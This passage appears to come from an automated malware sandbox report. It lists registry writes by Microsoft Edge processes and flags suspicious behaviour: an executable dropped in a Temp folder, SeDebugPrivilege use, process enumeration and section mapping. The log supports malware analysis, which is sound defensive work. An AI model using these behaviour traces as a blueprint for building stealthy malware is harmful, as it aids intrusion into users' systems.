Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VendorId = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Extensible Cache C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = d149192cff06da01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\ACGStatus\ACGPolicyState = "8" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 0ec76d26ff06da01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "268435456" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$Telligent C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\SplashScreen C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-087602 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 8f141032ff06da01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\OneTimeCleanup = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\CIStatus\SignaturePolicy = 06000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = adfe2f41ff06da01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\SignaturePolicy = 06000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3zj66Wk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3zj66Wk.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3zj66Wk.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
